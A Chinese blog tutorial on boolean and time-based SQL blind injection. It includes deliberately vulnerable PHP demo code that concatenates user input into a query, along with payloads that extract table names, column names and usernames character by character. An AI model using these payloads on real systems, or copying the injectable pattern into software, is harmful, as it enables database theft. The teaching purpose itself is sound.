当前位置: 首页 > article >正文

完善sql盲注中的其他函数 dnslog+sqlmap外带数据

article 2025/2/21 4:18:47

2. 布尔盲注
布尔盲注是通过观察应用程序的响应(如页面内容、HTTP 状态码等)来判断查询条件是否为真。

<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';

// 创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// 获取用户输入的参数
$id = $_GET['id'];

// 构造布尔盲注查询
$query = "SELECT * FROM users WHERE id = $id AND 1=1";
$result = $conn->query($query);

// 根据查询结果返回不同响应
if ($result->num_rows > 0) {
    echo "Query is TRUE (数据存在)";
} else {
    echo "Query is FALSE (数据不存在)";
}

// 关闭连接
$conn->close();
?>

布尔盲注的利用:
攻击者可以通过修改 `id` 参数,逐步推断数据库信息。例如:

获取表名:

sql
  id=1 AND (SELECT SUBSTRING(table_name,1,1) FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1)='a'


获取列名:

sql
  id=1 AND (SELECT SUBSTRING(column_name,1,1) FROM information_schema.columns WHERE table_name='users' LIMIT 1)='u'


获取数据:

sql
  id=1 AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'

2. 时间盲注
时间盲注是通过在 SQL 查询中插入时间延迟函数(如 `SLEEP()`),根据数据库响应时间来判断查询条件是否为真。
php
<?php
// 数据库连接配置
$host = 'localhost';
$dbname = 'testdb';
$user = 'root';
$password = 'password';
// 创建数据库连接
$conn = new mysqli($host, $user, $password, $dbname);

// 检查连接
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}

// 获取用户输入的参数
$id = $_GET['id'];

// 构造时间盲注查询
$query = "SELECT * FROM users WHERE id = $id AND IF(1=1, SLEEP(5), 0)";
$start_time = microtime(true); // 记录开始时间
$result = $conn->query($query);
$end_time = microtime(true); // 记录结束时间

// 计算查询耗时
$query_time = $end_time - $start_time;

// 根据查询时间判断结果
if ($query_time > 5) {
    echo "Query is TRUE (延迟 5 秒)";
} else {
    echo "Query is FALSE (无延迟)";
}

// 关闭连接
$conn->close();
?>
 

时间盲注的利用:
攻击者可以通过修改 `id` 参数,逐步推断数据库信息。例如:

获取表名:

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),1,1))=97, SLEEP(5), 0)


获取列名:

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1),1,1))=117, SLEEP(5), 0)


获取数据:

sql
  id=1 AND IF(ASCII(SUBSTRING((SELECT username FROM users LIMIT 1),1,1))=97, SLEEP(5), 0)
 

---

3. 获取表名、列名和数据的完整流程
以下是结合布尔盲注和时间盲注的完整流程,用于获取数据库的表名、列名和数据。
步骤 1:获取表名

使用布尔盲注或时间盲注,逐个字符推断表名。
示例:
sql
  id=1 AND ASCII(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1 OFFSET 0),1,1))=97
  

步骤 2:获取列名

使用布尔盲注或时间盲注,逐个字符推断列名。
示例:
sql
  id=1 AND ASCII(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name='users' LIMIT 1 OFFSET 0),1,1))=117
  

步骤 3:获取数据

使用布尔盲注或时间盲注,逐个字符推断数据。
示例:
sql
  id=1 AND ASCII(SUBSTRING((SELECT username FROM users LIMIT 1 OFFSET 0),1,1))=97


http://www.kler.cn/a/544630.html

相关文章:

  • 单调栈及相关题解
  • 数据仓库与数据挖掘记录 三
  • DeepSeek:优化学习路径生成,为教育领域带来智能化解决方案
  • 机器学习所需要的数学知识【01】
  • 企语企业管理系iFair(F23.2_a0)在Debian操作系统中的安装
  • O1、R1和V3模型
  • 二次封装axios解决异步通信痛点
  • 本地生活案例列表案例
  • MATLAB算法实战应用案例精讲-【数模应用】灰度图像增强(附MATLAB、C++和python代码实现)
  • 【数据可视化-16】珍爱网上海注册者情况分析
  • Linux 内核架构入门:从基础概念到面试指南*
  • leetcode-495.提莫攻击
  • 蓝桥杯单片机大模板(西风)
  • 6.appender
  • Python(下)
  • sqlilabs--小实验
  • 深度学习框架探秘|TensorFlow vs PyTorch:AI 框架的巅峰对决
  • 2025年02月10日Github流行趋势
  • C语言——排序(冒泡,选择,插入)
  • 【Elasticsearch】内置分析器概述